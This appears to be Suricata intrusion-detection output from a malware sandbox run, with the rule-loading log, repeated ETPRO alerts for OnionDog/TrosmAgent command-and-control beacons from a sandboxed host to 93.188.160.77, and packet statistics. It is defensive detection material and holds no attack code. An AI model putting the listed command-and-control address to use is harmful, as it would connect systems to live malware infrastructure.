13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
13/8/2019 -- 12:10:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
13/8/2019 -- 12:11:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
13/8/2019 -- 12:11:00 - <Config> - No rules loaded from local.rules.
13/8/2019 -- 12:11:00 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
13/8/2019 -- 12:11:00 - <Info> - Threshold config parsed: 0 rule(s) found
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tcp-packet
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tcp-stream
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for udp-packet
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for other-ip
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_uri
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_request_line
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_client_body
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_response_line
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_header
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_header
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_header_names
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_header_names
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_accept
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_accept_enc
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_accept_lang
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_referer
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_connection
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_content_len
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_content_len
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_content_type
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_content_type
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_protocol
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_protocol
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_start
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_start
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_raw_header
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_raw_header
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_method
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_cookie
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_cookie
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_raw_uri
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_user_agent
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_host
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_raw_host
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_stat_msg
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_stat_code
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for dns_query
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tls_sni
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tls_cert_issuer
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tls_cert_subject
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for tls_cert_serial
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for dce_stub_data
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for dce_stub_data
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for ssh_protocol
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for ssh_protocol
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for ssh_software
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for ssh_software
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for file_data
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for file_data
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_request_line
13/8/2019 -- 12:11:01 - <Perf> - using shared mpm ctx' for http_response_line
13/8/2019 -- 12:11:01 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
13/8/2019 -- 12:11:01 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
13/8/2019 -- 12:11:01 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
13/8/2019 -- 12:11:01 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
13/8/2019 -- 12:11:01 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
13/8/2019 -- 12:11:01 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
13/8/2019 -- 12:11:01 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
13/8/2019 -- 12:11:01 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
13/8/2019 -- 12:11:09 - <Perf> - Unique rule groups: 104
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toserver TCP packet": 35
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toclient TCP packet": 17
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toserver TCP stream": 33
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toclient TCP stream": 19
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toserver UDP packet": 27
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "toclient UDP packet": 17
13/8/2019 -- 12:11:09 - <Perf> - Builtin MPM "other IP packet": 3
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_uri": 14
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_request_line": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_client_body": 6
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_response_line": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_header": 10
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_header": 6
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_header_names": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_accept": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_referer": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_content_len": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_content_type": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_content_type": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_protocol": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_start": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_method": 5
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_cookie": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_cookie": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver http_host": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver dns_query": 4
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver tls_sni": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toserver file_data": 1
13/8/2019 -- 12:11:09 - <Perf> - AppLayer MPM "toclient file_data": 7
13/8/2019 -- 12:11:12 - <Perf> - Registered 39590 rule profiling counters.
13/8/2019 -- 12:11:12 - <Info> - fast output device (regular) initialized: alert
13/8/2019 -- 12:11:12 - <Info> - eve-log output device (regular) initialized: eve.json
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'alert'
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'http'
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'dns'
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'tls'
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'files'
13/8/2019 -- 12:11:12 - <Config> - enabling 'eve-log' module 'ssh'
13/8/2019 -- 12:11:12 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
13/8/2019 -- 12:11:12 - <Info> - stats output device (regular) initialized: stats.log
13/8/2019 -- 12:11:12 - <Config> - AutoFP mode using "Hash" flow load balancer
13/8/2019 -- 12:11:12 - <Info> - reading pcap file /var/pcap/08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af46

This file has been truncated.


suricata-4.0.0-etpro-all-alert-2019-08-13-T-12-11-14-08132019.1210-1a0281a7d09b36c1d94e302f14eafb2ca7144a6cee42d89af4604858683afef5.pcap.txt - (63753 bytes)
15.415054  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1049 -> 93.188.160.77:80
15.626881  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1050 -> 93.188.160.77:80
15.838390  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 93.188.160.77:80
16.038016  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1052 -> 93.188.160.77:80
16.229765  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1053 -> 93.188.160.77:80
16.441451  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1054 -> 93.188.160.77:80
16.656557  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1055 -> 93.188.160.77:80
16.846564  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1056 -> 93.188.160.77:80
17.038384  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1057 -> 93.188.160.77:80
17.233111  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1058 -> 93.188.160.77:80
17.456246  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1059 -> 93.188.160.77:80
17.678803  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1060 -> 93.188.160.77:80
17.902525  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1061 -> 93.188.160.77:80
18.099694  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1062 -> 93.188.160.77:80
18.314913  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1063 -> 93.188.160.77:80
18.527422  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1064 -> 93.188.160.77:80
18.714201  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1065 -> 93.188.160.77:80
18.932205  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1066 -> 93.188.160.77:80
19.125776  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1067 -> 93.188.160.77:80
19.337315  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1068 -> 93.188.160.77:80
19.558551  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1069 -> 93.188.160.77:80
19.756485  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1070 -> 93.188.160.77:80
19.970746  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1071 -> 93.188.160.77:80
20.162659  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1072 -> 93.188.160.77:80
20.355190  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1073 -> 93.188.160.77:80
20.566667  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1074 -> 93.188.160.77:80
20.796394  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1075 -> 93.188.160.77:80
21.005407  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1076 -> 93.188.160.77:80
21.201938  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1077 -> 93.188.160.77:80
21.414146  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1078 -> 93.188.160.77:80
21.646260  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1079 -> 93.188.160.77:80
21.863440  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1080 -> 93.188.160.77:80
22.078286  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1081 -> 93.188.160.77:80
22.289998  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1082 -> 93.188.160.77:80
22.479244  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1083 -> 93.188.160.77:80
22.677310  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1084 -> 93.188.160.77:80
22.889644  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1085 -> 93.188.160.77:80
23.110404  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1086 -> 93.188.160.77:80
23.301288  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1087 -> 93.188.160.77:80
23.496318  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1088 -> 93.188.160.77:80
23.708775  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1089 -> 93.188.160.77:80
23.902901  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1090 -> 93.188.160.77:80
24.110608  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1091 -> 93.188.160.77:80
24.296917  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1092 -> 93.188.160.77:80
24.505792  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1093 -> 93.188.160.77:80
24.718750  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1094 -> 93.188.160.77:80
24.908659  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1095 -> 93.188.160.77:80
25.121069  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1096 -> 93.188.160.77:80
25.312715  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1097 -> 93.188.160.77:80
25.505613  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1098 -> 93.188.160.77:80
25.705126  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1099 -> 93.188.160.77:80
25.898512  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1100 -> 93.188.160.77:80
26.094065  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1101 -> 93.188.160.77:80
26.309295  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1102 -> 93.188.160.77:80
26.503486  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1103 -> 93.188.160.77:80
26.719201  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1104 -> 93.188.160.77:80
26.911768  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1105 -> 93.188.160.77:80
27.120979  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1106 -> 93.188.160.77:80
27.314528  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1107 -> 93.188.160.77:80
27.522773  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1108 -> 93.188.160.77:80
27.709455  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1109 -> 93.188.160.77:80
27.906982  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1110 -> 93.188.160.77:80
28.098750  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1111 -> 93.188.160.77:80
28.291541  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1112 -> 93.188.160.77:80
28.482940  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1113 -> 93.188.160.77:80
28.694458  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1114 -> 93.188.160.77:80
28.906030  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1115 -> 93.188.160.77:80
29.094359  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1116 -> 93.188.160.77:80
29.304030  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1117 -> 93.188.160.77:80
29.519182  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1118 -> 93.188.160.77:80
29.713234  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1119 -> 93.188.160.77:80
29.906963  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1120 -> 93.188.160.77:80
30.123878  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1121 -> 93.188.160.77:80
30.317741  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1122 -> 93.188.160.77:80
30.537197  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1123 -> 93.188.160.77:80
30.729489  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1124 -> 93.188.160.77:80
30.949660  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1125 -> 93.188.160.77:80
31.164867  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1126 -> 93.188.160.77:80
31.365530  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1127 -> 93.188.160.77:80
31.571741  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1128 -> 93.188.160.77:80
31.786928  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1129 -> 93.188.160.77:80
31.998974  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1130 -> 93.188.160.77:80
32.187045  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1131 -> 93.188.160.77:80
32.395655  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1132 -> 93.188.160.77:80
32.608119  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1133 -> 93.188.160.77:80
32.820730  [**] [1:2012612:16] E

This file has been truncated. Go here to download in full.


stats.log - (3081 bytes) - download
------------------------------------------------------------------------------------
Date: 8/13/2019 -- 12:11:13 (uptime: 0d, 00h 00m 01s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 2993
decoder.bytes                              | Total                     | 326330
decoder.invalid                            | Total                     | 1
decoder.ipv4                               | Total                     | 2989
decoder.ethernet                           | Total                     | 2993
decoder.tcp                                | Total                     | 2899
decoder.udp                                | Total                     | 51
decoder.icmpv4                             | Total                     | 37
decoder.avg_pkt_size                       | Total                     | 109
decoder.max_pkt_size                       | Total                     | 590
flow.tcp                                   | Total                     | 323
flow.udp                                   | Total                     | 8
decoder.ethernet.pkt_too_small             | Total                     | 1
tcp.sessions                               | Total                     | 323
tcp.syn                                    | Total                     | 323
tcp.synack                                 | Total                     | 322
tcp.rst                                    | Total                     | 322
detect.alert                               | Total                     | 322
